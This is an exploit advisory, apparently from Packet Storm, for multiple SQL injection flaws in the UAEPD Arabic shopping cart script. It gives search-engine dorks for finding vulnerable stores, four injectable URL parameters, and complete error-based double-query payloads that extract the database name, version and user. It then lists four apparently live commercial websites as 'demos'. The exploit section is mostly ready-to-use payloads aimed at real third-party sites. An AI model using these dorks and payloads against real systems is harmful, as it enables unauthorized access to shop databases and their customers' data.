UAEPD Shopping Script SQL Injection

2014-01-08T00:00:00
ID PACKETSTORM:124723
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2014-01-08T00:00:00

Description

                                        
                                            `uaepd script – Multiple Sql Injection Vulnerabilty  
====================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.uaepd.net/  
.:. Dork : [1]inurl:”products.php?cat_id=” “Powered by: PD ”  
[2]inurl:”products.php?p_id” “Powered by: PD ”  
[3]inurl:”page.php?id=” “Powered by: PD ”  
[4]inurl:”news.php?id=” “Powered by: PD ”  
####################################################################  
  
I. INTORUCTION  
  
uaepd script is arabic Shopping Cart Script and have many Features  
  
II. DESCRIPTION  
  
#Control Panel provides an Arabic or English.  
#View the store for the visitor in Arabic and English.  
#Possibility to choose one language or operating languages.  
#The ability to add unlimited number of pages.  
#Format property provides all store pages.  
#Add YouTube links and images in all the pages of the store.  
#The ability to add sections of main and sub.  
#Add an unlimited number of products.  
#Add multiple images of the products.  
#Availability of property sizes and colors for each product.  
#Print logo on the product images automatically.  
#Availability of property with a shipping price for each region.  
#Buy products shopping cart system.  
#You can ask system of members with or without system.  
#Three ways to pay:(bank transfer-Receipt & received-Paypal).  
#Send an e-mail automatically to any purchase or booking.  
#Provide a search feature in the products.  
#Availability of the currencies of the property.  
#Comprehensive statistics for the purchases and reservations.  
#Guestbook available partition.  
#Provide property advertising space multiple places.  
#Property provides the tape device.  
#Offers the possibility to close or open the store.  
  
III. TYPE BUG  
  
Sql injection (command double query)  
  
IV. BUG  
  
site/products.php?cat_id=[sql injection]  
site/products.php?p_id=[sql injection]  
site/page.php?id=[sql injection]  
site/news.php?id=[sql injection]  
  
VII. EXPLOIT  
  
TO EXTRACT VERSION & NAME & USER DATABASE:  
  
site/products.php?cat_id=99999+and (select 1 from (select  
count(*),concat((select(select  
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))  
from information_schema.tables limit 0,1),floor(rand(0)*2))x from  
information_schema.tables group by x)a) and 1=1  
site/products.php?p_id=99999+and (select 1 from (select  
count(*),concat((select(select  
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))  
from information_schema.tables limit 0,1),floor(rand(0)*2))x from  
information_schema.tables group by x)a) and 1=1  
site/page.php?id=99999+and (select 1 from (select  
count(*),concat((select(select  
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))  
from information_schema.tables limit 0,1),floor(rand(0)*2))x from  
information_schema.tables group by x)a) and 1=1  
site/news.php?id=99999+and (select 1 from (select  
count(*),concat((select(select  
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))  
from information_schema.tables limit 0,1),floor(rand(0)*2))x from  
information_schema.tables group by x)a) and 1=1  
  
DEMOS:  
  
http://sedenshop.com/products.php?p_id=3  
  
http://www.henna.ae/products.php?cat_id=1  
  
http://www.shah-een.com/news.php?id=1  
  
http://www.nourita.com/products.php?cat_id=4  
  
####################################################################  
`